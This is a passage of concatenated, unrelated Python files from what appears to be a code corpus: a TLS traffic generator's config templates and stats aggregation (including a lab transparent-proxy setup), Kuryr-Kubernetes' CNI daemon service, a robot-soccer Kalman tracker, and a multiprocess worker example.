"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.nb_iface_container}} up",
"ifconfig {{PARAMS.nb_iface_container}} hw ether {{PARAMS.server_mac_seed}}:{{'{:02x}'.format(zone_id)}}",
"ip route add default dev {{PARAMS.nb_iface_container}} table 200",
"ip -4 route add local 24.2{{zone_id}}.51.0/24 dev lo",
"ip rule add from 24.2{{zone_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.nb_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.result_dir_container}}/zone-{{zone_id}}-server/init.pcap &"
]
}
{{ "," if not loop.last }}
{%- endfor %}
]
}
''')
if cmd_args.ecdsa_cert:
cmd_args.server_cert = '/rundir/certs/server2.cert'
cmd_args.server_key = '/rundir/certs/server2.key'
else:
cmd_args.server_cert = '/rundir/certs/server.cert'
cmd_args.server_key = '/rundir/certs/server.key'
return tlspack_cfg.render(PARAMS = cmd_args)
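# Same per-zone aggregation as process_cps_stats, but stricter: if any
# zone's ev_sockstats.json is missing or unreadable, the partial client and
# server lists are discarded and no merged files are written.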
def process_bw_stats(result_dir):
ev_sockstats_client_list = []
ev_sockstats_server_list = []
result_dir_contents = []
try:
result_dir_contents = os.listdir(result_dir)
except:
pass
for zone_dir in result_dir_contents:
zone_dir_path = os.path.join(result_dir, zone_dir)
if os.path.isdir(zone_dir_path):
ev_sockstats_json_file = os.path.join (zone_dir_path
, 'ev_sockstats.json')
try:
with open(ev_sockstats_json_file) as f:
stats_j = json.load(f)
if zone_dir.endswith('-client'):
ev_sockstats_client_list.append (stats_j)
if zone_dir.endswith('-server'):
ev_sockstats_server_list.append (stats_j)
except:
ev_sockstats_client_list = []
ev_sockstats_server_list = []
break
if ev_sockstats_client_list:
ev_sockstats = ev_sockstats_client_list.pop()
while ev_sockstats_client_list:
next_ev_sockstats = ev_sockstats_client_list.pop()
for k, v in next_ev_sockstats.items():
ev_sockstats[k] += v
with open(os.path.join(result_dir, 'ev_sockstats_client.json'), 'w') as f:
json.dump(ev_sockstats, f)
if ev_sockstats_server_list:
ev_sockstats = ev_sockstats_server_list.pop()
while ev_sockstats_server_list:
next_ev_sockstats = ev_sockstats_server_list.pop()
for k, v in next_ev_sockstats.items():
ev_sockstats[k] += v
with open(os.path.join(result_dir, 'ev_sockstats_server.json'), 'w') as f:
json.dump(ev_sockstats, f)
def add_tproxy_params (cmd_parser):
pass
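# Builds a single-zone transparent-proxy config: a tcp_proxy app listens on
# 0.0.0.0:883 inside the zone-1-proxy container. The host_cmds attach the
# ta/tb macvlan networks to that container; the zone_cmds disable rp_filter,
# create VLAN subinterfaces for the proxy traffic VLAN, add static ARP
# entries and routes toward the client/server subnets, install the iptables
# mangle DIVERT chain plus the fwmark-1 / table-100 local route so marked
# flows are delivered locally, and TPROXY-redirect port-443 traffic from
# both VLAN subinterfaces to proxy port 883, with tcpdump capturing on both
# sides.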
def process_tproxy_template (cmd_args):
tlspack_cfg = jinja2.Template ('''{
"tgen_app" : "tproxy",
"zones" : [
{
"zone_label" : "zone-1-proxy",
"enable" : 1,
"app_list" : [
{
"app_type" : "tcp_proxy",
"app_label" : "tcp_proxy_1",
"enable" : 1,
"proxy_list" : [
{
"proxy_label" : "bae-issue",
"enable" : 1,
"proxy_ip" : "0.0.0.0",
"proxy_port" : 883,
"proxy_type_id" : 1,
"tcp_rcv_buff" : 0,
"tcp_snd_buff" : 0
}
]
}
],
"host_cmds" : [
"sudo ip link set dev {{PARAMS.ta_iface}} up",
"sudo ip link set dev {{PARAMS.tb_iface}} up",
"sudo docker network connect {{PARAMS.ta_macvlan}} {{PARAMS.runtag}}-zone-1-proxy",
"sudo docker network connect {{PARAMS.tb_macvlan}} {{PARAMS.runtag}}-zone-1-proxy"
],
"zone_cmds" : [
"sysctl net.ipv4.conf.all.rp_filter=0",
"sysctl net.ipv4.conf.default.rp_filter=0",
"ip link set dev {{PARAMS.ta_iface_container}} up",
"ifconfig {{PARAMS.ta_iface_container}} hw ether 00:50:56:8c:5a:54",
"sysctl net.ipv4.conf.{{PARAMS.ta_iface_container}}.rp_filter=0",
"ip link add link {{PARAMS.ta_iface_container}} name {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} type vlan id {{PARAMS.proxy_traffic_vlan}}",
"ip link set dev {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} up",
"ip addr add 1.1.1.1/24 dev {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"arp -i {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -s 1.1.1.254 00:50:56:8c:86:c3",
"ip route add {{PARAMS.ta_subnet}} via 1.1.1.254 dev {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"ip link set dev {{PARAMS.tb_iface_container}} up",
"ifconfig {{PARAMS.tb_iface_container}} hw ether 00:50:56:8c:86:c3",
"sysctl net.ipv4.conf.{{PARAMS.tb_iface_container}}.rp_filter=0",
"ip link add link {{PARAMS.tb_iface_container}} name {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} type vlan id {{PARAMS.proxy_traffic_vlan}}",
"ip link set dev {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} up",
"ip addr add 2.2.2.1/24 dev {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"arp -i {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -s 2.2.2.254 00:50:56:8c:5a:54",
"ip route add {{PARAMS.tb_subnet}} via 2.2.2.254 dev {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"iptables -t mangle -N DIVERT",
"iptables -t mangle -A PREROUTING -p tcp -m socket -j DIVERT",
"iptables -t mangle -A DIVERT -j MARK --set-mark 1",
"iptables -t mangle -A DIVERT -j ACCEPT",
"ip rule add fwmark 1 lookup 100",
"ip route add local 0.0.0.0/0 dev lo table 100",
"iptables -t mangle -A PREROUTING -i {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -p tcp --dport 443 -j TPROXY --tproxy-mark 0x1/0x1 --on-port 883",
"iptables -t mangle -A PREROUTING -i {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -p tcp --dport 443 -j TPROXY --tproxy-mark 0x1/0x1 --on-port 883",
"tcpdump -i {{PARAMS.ta_iface_container}} {{PARAMS.ta_tcpdump}} -w {{PARAMS.result_dir_container}}/zone-1-proxy/ta.pcap &",
"tcpdump -i {{PARAMS.tb_iface_container}} {{PARAMS.tb_tcpdump}} -w {{PARAMS.result_dir_container}}/zone-1-proxy/tb.pcap &"
]
}
]
}
''')
return tlspack_cfg.render(PARAMS = cmd_args)
def process_tproxy_stats (result_dir):
pass
def add_mcert_params (cmd_parser):
pass
def process_mcert_template (cmd_args):
tlspack_cfg = jinja2.Template('''
{
"tgen_app" : "mcert",
"zones" : [
{% set ns = namespace(cs_grp_count=0, srv_count=0) %}
{%- for zone_id in range(1, PARAMS.zones+1) %}
{
"zone_label" : "zone-{{zone_id}}-client",
"enable" : 1,
"app_list" : [
{
"app_type" : "tls_client",
"app_label" : "tls_client_1",
"enable" : 1,
"conn_per_sec" : {{PARAMS.cps}},
"max_pending_conn_count" : {{PARAMS.max_pipeline}},
"max_active_conn_count" : {{PARAMS.max_active}},
"total_conn_count" : {{PARAMS.total_conn_count}},
"cs_grp_list" : [
{% set ns.cs_grp_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.cs_grp_count }}
{% set ns.cs_grp_count = ns.cs_grp_count+1 %}
{
"cs_grp_label" : "cs_grp_{{loop.index}}",
"enable" : 1,
"srv_ip" : "14.2{{zone_id}}.51.{{loop.index}}",
"srv_port" : 443,
"clnt_ip_begin" : "12.2{{zone_id}}.51.{{1+loop.index0*10}}",
"clnt_ip_end" : "12.2{{zone_id}}.51.{{loop.index*10}}",
"clnt_port_begin" : {{PARAMS.port_begin}},
"clnt_port_end" : 65000,
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : 0,
"sc_start_tls_len" : 0
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.na_iface_container}} up",
"ifconfig {{PARAMS.na_iface_container}} hw ether {{PARAMS.client_mac_seed}}:{{'{:02x}'.format(zone_id)}}",
"ip route add default dev {{PARAMS.na_iface_container}} table 200",
"ip -4 route add local 12.2{{zone_id}}.51.0/24 dev lo",
"ip rule add from 12.2{{zone_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.na_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.result_dir_container}}/zone-{{zone_id}}-client/init.pcap &"
]
}
,
{
"zone_label" : "zone-{{zone_id}}-server",
"enable" : 1,
"iface" : "{{PARAMS.iface_container}}",
"tcpdump" : "{{PARAMS.tcpdump}}",
"app_list" : [
{
"app_type" : "tls_server",
"app_label" : "tls_server_1",
"enable" : 1,
"srv_list" : [
{% set ns.srv_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.srv_count }}
{% set ns.srv_count = ns.srv_count+1 %}
{
"srv_label" : "srv_{{loop.index}}",
"enable" : 1,
"emulation_id" : 0,
"srv_ip" : "14.2{{zone_id}}.51.{{loop.index}}",
"srv_port" : 443,
"srv_cert" : "{{PARAMS.server_cert}}",
"srv_key" : "{{PARAMS.server_key}}",
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : 0,
"sc_start_tls_len" : 0
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.nb_iface_container}} up",
"ifconfig {{PARAMS.nb_iface_container}} hw ether {{PARAMS.server_mac_seed}}:{{'{:02x}'.format(zone_id)}}",
"ip route add default dev {{PARAMS.nb_iface_container}} table 200",
"ip -4 route add local 14.2{{zone_id}}.51.0/24 dev lo",
"ip rule add from 14.2{{zone_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.nb_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.result_dir_container}}/zone-{{zone_id}}-server/init.pcap &"
]
}
{{ "," if not loop.last }}
{%- endfor %}
]
}
''')
return tlspack_cfg.render(PARAMS = cmd_args)
def process_mcert_stats(result_dir):
ev_sockstats_client_list = []
ev_sockstats_server_list = []
result_dir_contents = []
try:
result_dir_contents = os.listdir(result_dir)
except:
pass
for zone_dir in result_dir_contents:
zone_dir_path = os.path.join(result_dir, zone_dir)
if os.path.isdir(zone_dir_path):
ev_sockstats_json_file = os.path.join (zone_dir_path
, 'ev_sockstats.json')
try:
with open(ev_sockstats_json_file) as f:
stats_j = json.load(f)
if zone_dir.endswith('-client'):
ev_sockstats_client_list.append (stats_j)
if zone_dir.endswith('-server'):
ev_sockstats_server_list.append (stats_j)
except:
ev_sockstats_client_list = []
ev_sockstats_server_list = []
break
if ev_sockstats_client_list:
ev_sockstats = ev_sockstats_client_list.pop()
while ev_sockstats_client_list:
next_ev_sockstats = ev_sockstats_client_list.pop()
for k, v in next_ev_sockstats.items():
ev_sockstats[k] += v
with open(os.path.join(result_dir, 'ev_sockstats_client.json'), 'w') as f:
json.dump(ev_sockstats, f)
if ev_sockstats_server_list:
ev_sockstats = ev_sockstats_server_list.pop()
while ev_sockstats_server_list:
next_ev_sockstats = ev_sockstats_server_list.pop()
for k, v in next_ev_sockstats.items():
ev_sockstats[k] += v
with open(os.path.join(result_dir, 'ev_sockstats_server.json'), 'w') as f:
json.dump(ev_sockstats, f)
def get_arguments ():
arg_parser = argparse.ArgumentParser(description = 'test commands')
subparsers = arg_parser.add_subparsers(dest='cmd_name'
,help='sub-command help')
cps_parser = subparsers.add_parser('cps', help='cps help')
add_traffic_params(cps_parser)
add_cps_params (cps_parser)
bw_parser = subparsers.add_parser('bw', help='bw help')
add_traffic_params(bw_parser)
add_bw_params (bw_parser)
mcert_parser = subparsers.add_parser('mcert', help='mcert help')
add_traffic_params(mcert_parser)
add_mcert_params (mcert_parser)
tproxy_parser = subparsers.add_parser('tproxy', help='tproxy help')
add_proxy_params (tproxy_parser)
add_tproxy_params (tproxy_parser)
stop_parser = subparsers.add_parser('stop', help='stop help')
add_stop_params (stop_parser)
status_parser = subparsers.add_parser('status', help='status help')
add_status_params (status_parser)
enter_parser = subparsers.add_parser('enter', help='enter help')
add_enter_params (enter_parser)
exit_parser = subparsers.add_parser('exit', help='exit help')
add_exit_params (exit_parser)
cmd_args = arg_parser.parse_args()
return cmd_args
if __name__ == '__main__':
try:
cmd_args = get_arguments ()
except Exception as er:
print(er)
sys.exit(1)
host_file = os.path.join (cmd_args.host_rundir, 'sys/host')
try:
with open(host_file) as f:
host_info = json.load(f)
except Exception as er:
print(er)
sys.exit(1)
if cmd_args.cmd_name in ['cps', 'bw', 'tproxy', 'mcert']:
cmd_args.result_dir_container = os.path.join(cmd_args.target_rundir, 'traffic', cmd_args.runtag, 'result')
if cmd_args.cmd_name in ['cps', 'bw', 'mcert']:
cmd_args.na_iface_container = host_info['net_iface_map'][cmd_args.na_iface]
cmd_args.nb_iface_container = host_info['net_iface_map'][cmd_args.nb_iface]
cmd_args.cps = cmd_args.cps / cmd_args.zones
cmd_args.max_active = cmd_args.max_active / cmd_args.zones
cmd_args.max_pipeline = cmd_args.max_pipeline / cmd_args.zones
# use lists (not lazy map objects) so repeated membership checks also work on Python 3
supported_cipher_names = [x['cipher_name'] for x in supported_ciphers]
if cmd_args.cmd_name == 'cipher':
selected_ciphers = [x.strip() for x in cmd_args.cipher.split(':')]
for ciph in selected_ciphers:
if ciph not in supported_cipher_names:
raise Exception ('unsupported cipher - ' + ciph)
elif cmd_args.cmd_name == 'cps':
if cmd_args.cipher not in supported_cipher_names:
raise Exception ('unsupported cipher - ' + cmd_args.cipher)
elif cmd_args.cmd_name in ['tproxy']:
cmd_args.ta_iface_container = host_info['net_iface_map'][cmd_args.ta_iface]
cmd_args.tb_iface_container = host_info['net_iface_map'][cmd_args.tb_iface]
if cmd_args.cmd_name == 'cps':
traffic_s = process_cps_template(cmd_args)
elif cmd_args.cmd_name == 'bw':
traffic_s = process_bw_template(cmd_args)
elif cmd_args.cmd_name == 'tproxy':
traffic_s = process_tproxy_template(cmd_args)
elif cmd_args.cmd_name == 'mcert':
traffic_s = process_mcert_template(cmd_args)
cfg_dir, result_dir = start_traffic(host_info, cmd_args, traffic_s)
try:
pid = os.fork()
if pid > 0:
sys.exit(0)
except Exception as er:
print(er)
sys.exit(1)
devnull = open(os.devnull, 'w')
while True:
time.sleep (2)
subprocess.call(['rsync', '-av', '--delete'
, cfg_dir.rstrip('/')
, '/var/www/html/tmp']
, stdout=devnull, stderr=devnull)
if not is_traffic (cmd_args):
sys.exit(0)
if cmd_args.cmd_name == 'cps':
process_cps_stats (result_dir)
elif cmd_args.cmd_name == 'bw':
process_bw_stats (result_dir)
elif cmd_args.cmd_name == 'tproxy':
process_tproxy_stats (result_dir)
elif cmd_args.cmd_name == 'mcert':
process_mcert_stats (result_dir)
elif cmd_args.cmd_name == 'stop':
stop_traffic (host_info, cmd_args)
elif cmd_args.cmd_name == 'status':
show_traffic (host_info, cmd_args)
elif cmd_args.cmd_name == 'enter':
start_containers (host_info, cmd_args)
elif cmd_args.cmd_name == 'exit':
stop_containers (host_info, cmd_args)
|
service.py
|
# Copyright 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ctypes import c_bool
import multiprocessing
import os
from six.moves import http_client as httplib
import socket
import sys
import threading
import time
import cotyledon
import flask
from pyroute2.ipdb import transactional
import os_vif
from os_vif.objects import base
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from kuryr_kubernetes import clients
from kuryr_kubernetes.cni import handlers as h_cni
from kuryr_kubernetes.cni import health
from kuryr_kubernetes.cni.plugins import k8s_cni_registry
from kuryr_kubernetes.cni import utils as cni_utils
from kuryr_kubernetes import config
from kuryr_kubernetes import constants as k_const
from kuryr_kubernetes import exceptions
from kuryr_kubernetes import objects
from kuryr_kubernetes import utils
from kuryr_kubernetes import watcher as k_watcher
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
HEALTH_CHECKER_DELAY = 5
class DaemonServer(object):
def __init__(self, plugin, healthy):
self.ctx = None
self.plugin = plugin
self.healthy = healthy
self.failure_count = multiprocessing.Value('i', 0)
self.application = flask.Flask('kuryr-daemon')
self.application.add_url_rule(
'/addNetwork', methods=['POST'], view_func=self.add)
self.application.add_url_rule(
'/delNetwork', methods=['POST'], view_func=self.delete)
self.headers = {'ContentType': 'application/json',
'Connection': 'close'}
def _prepare_request(self):
params = cni_utils.CNIParameters(flask.request.get_json())
LOG.debug('Received %s request. CNI Params: %s',
params.CNI_COMMAND, params)
return params
def add(self):
try:
params = self._prepare_request()
except Exception:
self._check_failure()
LOG.exception('Exception when reading CNI params.')
return '', httplib.BAD_REQUEST, self.headers
try:
vif = self.plugin.add(params)
data = jsonutils.dumps(vif.obj_to_primitive())
except exceptions.ResourceNotReady as e:
self._check_failure()
LOG.error("Timed out waiting for requested pod to appear in "
"registry: %s.", e)
return '', httplib.GATEWAY_TIMEOUT, self.headers
except Exception:
self._check_failure()
LOG.exception('Error when processing addNetwork request. CNI '
'Params: %s', params)
return '', httplib.INTERNAL_SERVER_ERROR, self.headers
return data, httplib.ACCEPTED, self.headers
def delete(self):
try:
params = self._prepare_request()
except Exception:
LOG.exception('Exception when reading CNI params.')
return '', httplib.BAD_REQUEST, self.headers
try:
self.plugin.delete(params)
except exceptions.ResourceNotReady as e:
# NOTE(dulek): It's better to ignore this error - most of the time
# it will happen when pod is long gone and kubelet
# overzealously tries to delete it from the network.
# We cannot really do anything without VIF annotation,
# so let's just tell kubelet to move along.
LOG.warning("Timed out waiting for requested pod to appear in "
"registry: %s. Ignoring.", e)
return '', httplib.NO_CONTENT, self.headers
except Exception:
LOG.exception('Error when processing delNetwork request. CNI '
'Params: %s.', params)
return '', httplib.INTERNAL_SERVER_ERROR, self.headers
return '', httplib.NO_CONTENT, self.headers
def run(self):
server_pair = CONF.cni_daemon.bind_address
LOG.info('Starting server on %s.', server_pair)
try:
address, port = server_pair.split(':')
port = int(port)
except ValueError:
LOG.exception('Cannot start server on %s.', server_pair)
raise
try:
self.application.run(address, port,
processes=CONF.cni_daemon.worker_num)
except Exception:
LOG.exception('Failed to start kuryr-daemon.')
raise
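# Count failed CNI requests; once CONF.cni_daemon.cni_failures_count is
# exceeded, flip the shared `healthy` flag so the health checker reports
# the daemon as unhealthy.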
def _check_failure(self):
with self.failure_count.get_lock():
if self.failure_count.value < CONF.cni_daemon.cni_failures_count:
self.failure_count.value += 1
else:
with self.healthy.get_lock():
LOG.debug("Reporting maximun CNI ADD failures reached.")
self.healthy.value = False
class CNIDaemonServerService(cotyledon.Service):
name = "server"
def __init__(self, worker_id, registry, healthy):
super(CNIDaemonServerService, self).__init__(worker_id)
self.run_queue_reading = False
self.registry = registry
self.healthy = healthy
self.plugin = k8s_cni_registry.K8sCNIRegistryPlugin(registry,
self.healthy)
self.server = DaemonServer(self.plugin, self.healthy)
def run(self):
# NOTE(dulek): We might do a *lot* of pyroute2 operations, let's
# make the pyroute2 timeout configurable to make sure
# kernel will have chance to catch up.
transactional.SYNC_TIMEOUT = CONF.cni_daemon.pyroute2_timeout
# Run HTTP server
self.server.run()
class CNIDaemonWatcherService(cotyledon.Service):
name = "watcher"
def __init__(self, worker_id, registry, healthy):
super(CNIDaemonWatcherService, self).__init__(worker_id)
self.pipeline = None
self.watcher = None
self.health_thread = None
self.registry = registry
self.healthy = healthy
def _get_nodename(self):
# NOTE(dulek): At first try to get it using environment variable,
# otherwise assume hostname is the nodename.
try:
nodename = os.environ['KUBERNETES_NODE_NAME']
except KeyError:
nodename = socket.gethostname()
return nodename
def run(self):
self.pipeline = h_cni.CNIPipeline()
self.pipeline.register(h_cni.CallbackHandler(self.on_done,
self.on_deleted))
self.watcher = k_watcher.Watcher(self.pipeline)
self.watcher.add(
"%(base)s/pods?fieldSelector=spec.nodeName=%(node_name)s" % {
'base': k_const.K8S_API_BASE,
'node_name': self._get_nodename()})
self.is_running = True
self.health_thread = threading.Thread(
target=self._start_watcher_health_checker)
self.health_thread.start()
self.watcher.start()
def _start_watcher_health_checker(self):
while self.is_running:
if not self.watcher.is_healthy():
LOG.debug("Reporting watcher not healthy.")
with self.healthy.get_lock():
self.healthy.value = False
time.sleep(HEALTH_CHECKER_DELAY)
def on_done(self, pod, vif):
pod_name = utils.get_pod_unique_name(pod)
vif_dict = vif.obj_to_primitive()
# NOTE(dulek): We need a lock when modifying shared self.registry dict
# to prevent race conditions with other processes/threads.
with lockutils.lock(pod_name, external=True):
if pod_name not in self.registry:
self.registry[pod_name] = {'pod': pod, 'vif': vif_dict,
'containerid': None}
else:
# NOTE(dulek): Only update vif if its status changed, we don't
# need to care about other changes now.
old_vif = base.VersionedObject.obj_from_primitive(
self.registry[pod_name]['vif'])
if old_vif.active != vif.active:
pod_dict = self.registry[pod_name]
pod_dict['vif'] = vif_dict
self.registry[pod_name] = pod_dict
def on_deleted(self, pod):
pod_name = utils.get_pod_unique_name(pod)
try:
if pod_name in self.registry:
# NOTE(dulek): del on dict is atomic as long as we use standard
# types as keys. This is the case, so we don't
# need to lock here.
del self.registry[pod_name]
except KeyError:
# This means someone else removed it. It's odd but safe to ignore.
pass
def terminate(self):
self.is_running = False
if self.health_thread:
self.health_thread.join()
if self.watcher:
self.watcher.stop()
class CNIDaemonHealthServerService(cotyledon.Service):
name = "health"
def __init__(self, worker_id, healthy):
super(CNIDaemonHealthServerService, self).__init__(worker_id)
self.health_server = health.CNIHealthServer(healthy)
def run(self):
self.health_server.run()
class CNIDaemonServiceManager(cotyledon.ServiceManager):
def __init__(self):
super(CNIDaemonServiceManager, self).__init__()
# TODO(dulek): Use cotyledon.oslo_config_glue to support conf reload.
# TODO(vikasc): Should be done using dynamically loadable OVO types
# plugin.
objects.register_locally_defined_vifs()
os_vif.initialize()
clients.setup_kubernetes_client()
self.manager = multiprocessing.Manager()
registry = self.manager.dict() # For Watcher->Server communication.
healthy = multiprocessing.Value(c_bool, True)
self.add(CNIDaemonWatcherService, workers=1, args=(registry, healthy,))
self.add(CNIDaemonServerService, workers=1, args=(registry, healthy,))
self.add(CNIDaemonHealthServerService, workers=1, args=(healthy,))
self.register_hooks(on_terminate=self.terminate)
def run(self):
super(CNIDaemonServiceManager, self).run()
def terminate(self):
self.manager.shutdown()
def start():
config.init(sys.argv[1:])
config.setup_logging()
CNIDaemonServiceManager().run()
|
tracker.py
|
import logging
import threading
import time
from typing import Union
import numpy as np
from tracker.filters.robot_kalman_filter import RobotFilter
from tracker.multiballservice import MultiBallService
from tracker.vision.vision_receiver import VisionReceiver
from tracker.constants import TrackerConst
from tracker.track_frame import TrackFrame, Robot, Ball
logging.basicConfig(level=logging.INFO, format='%(message)s')
class Tracker:
TRACKER_ADDRESS = TrackerConst.TRACKER_ADDRESS
MAX_BALL_ON_FIELD = TrackerConst.MAX_BALL_ON_FIELD
MAX_ROBOT_PER_TEAM = TrackerConst.MAX_ROBOT_PER_TEAM
STATE_PREDICTION_TIME = TrackerConst.STATE_PREDICTION_TIME
MAX_UNDETECTED_DELAY = TrackerConst.MAX_UNDETECTED_DELAY
def __init__(self, vision_address):
self.logger = logging.getLogger('Tracker')
self.thread_terminate = threading.Event()
self._thread = threading.Thread(target=self.tracker_main_loop)
self.last_sending_time = time.time()
self.vision_receiver = VisionReceiver(vision_address)
self.logger.info('VisionReceiver created. ({}:{})'.format(*vision_address))
self._blue_team = [RobotFilter() for _ in range(Tracker.MAX_ROBOT_PER_TEAM)]
self._yellow_team = [RobotFilter() for _ in range(Tracker.MAX_ROBOT_PER_TEAM)]
self._balls = MultiBallService(Tracker.MAX_BALL_ON_FIELD)
self._current_timestamp = None
@property
def is_running(self):
return self._thread.is_alive()
@property
def current_timestamp(self):
return self._current_timestamp
def start(self):
self.vision_receiver.start()
self._thread.start()
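# Main loop: block on the next vision detection frame, feed each robot
# observation to its per-robot Kalman filter and predict
# STATE_PREDICTION_TIME ahead, hand ball observations to the
# MultiBallService, then deactivate robots unseen for MAX_UNDETECTED_DELAY.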
def tracker_main_loop(self):
while not self.thread_terminate.is_set():
detection_frame = self.vision_receiver.get()
self._current_timestamp = detection_frame.t_capture
for robot_obs in detection_frame.robots_blue:
obs_state = np.array([robot_obs.x, robot_obs.y, robot_obs.orientation])
self._blue_team[robot_obs.robot_id].update(obs_state, detection_frame.t_capture)
self._blue_team[robot_obs.robot_id].predict(Tracker.STATE_PREDICTION_TIME)
for robot_obs in detection_frame.robots_yellow:
obs_state = np.array([robot_obs.x, robot_obs.y, robot_obs.orientation])
self._yellow_team[robot_obs.robot_id].update(obs_state, detection_frame.t_capture)
self._yellow_team[robot_obs.robot_id].predict(Tracker.STATE_PREDICTION_TIME)
for ball_obs in detection_frame.balls:
self._balls.update_with_observation(ball_obs, detection_frame.t_capture)
self.remove_undetected_robot()
def remove_undetected_robot(self):
for robot in self._yellow_team + self._blue_team:
if robot.last_t_capture + Tracker.MAX_UNDETECTED_DELAY < self.current_timestamp:
robot.is_active = False
@property
def track_frame(self) -> TrackFrame:
track_fields = dict()
track_fields['timestamp'] = self.current_timestamp
track_fields['robots_blue'] = self.blue_team
track_fields['robots_yellow'] = self.yellow_team
track_fields['balls'] = self.balls
return TrackFrame(**track_fields)
@property
def balls(self) -> Ball:
return Tracker.format_list(self._balls, Ball)
@property
def blue_team(self) -> Robot:
return Tracker.format_list(self._blue_team, Robot)
@property
def yellow_team(self) -> Robot:
return Tracker.format_list(self._yellow_team, Robot)
@staticmethod
def format_list(entities: list, entity_format: Union[Robot, Ball]):
format_list = []
for entity_id, entity in enumerate(entities):
if entity.is_active:
fields = dict()
fields['pose'] = tuple(entity.pose)
fields['velocity'] = tuple(entity.velocity)
fields['id'] = entity_id
format_list.append(entity_format(**fields))
return format_list
def stop(self):
self.thread_terminate.set()
self._thread.join()
self.thread_terminate.clear()
|
ex_workers.py
|
#
# Simple example which uses a pool of workers to carry out some tasks.
#
# Notice that the results will probably not come out of the output
# queue in the same order as the corresponding tasks were
# put on the input queue. If it is important to get the results back
# in the original order then consider using `Pool.map()` or
# `Pool.imap()` (which will save on the amount of code needed anyway).
#
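#
# A minimal sketch (not part of the original example) of the ordered
# alternative mentioned above. It assumes Python 3, reuses the `mul` task
# defined below, and uses a hypothetical helper name `ordered_results`;
# `Pool.starmap()` unpacks each argument tuple and returns results in
# submission order, so no explicit result queue is needed:
#
#   from multiprocess import Pool
#
#   def ordered_results():
#       tasks = [(i, 7) for i in range(20)]
#       with Pool(processes=4) as pool:
#           return pool.starmap(mul, tasks)
#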
import time
import random
from multiprocess import current_process as currentProcess, Process, freeze_support as freezeSupport
from multiprocess import Queue
#
# Function run by worker processes
#
def worker(input, output):
for func, args in iter(input.get, 'STOP'):
result = calculate(func, args)
output.put(result)
#
# Function used to calculate result
#
def calculate(func, args):
result = func(*args)
return '%s says that %s%s = %s' % \
(currentProcess().name, func.__name__, args, result)
#
# Functions referenced by tasks
#
def mul(a, b):
time.sleep(0.5*random.random())
return a * b
def plus(a, b):
time.sleep(0.5*random.random())
return a + b
#
#
#
def test():
NUMBER_OF_PROCESSES = 4
TASKS1 = [(mul, (i, 7)) for i in range(20)]
TASKS2 = [(plus, (i, 8)) for i in range(10)]
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
